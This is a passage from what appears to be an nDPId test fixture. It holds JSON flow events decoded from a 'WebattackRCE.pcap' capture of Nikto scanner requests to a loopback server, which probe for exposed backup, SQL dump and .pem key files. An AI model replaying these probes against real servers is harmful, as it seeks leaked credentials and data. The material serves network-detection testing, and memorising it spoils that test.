(Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 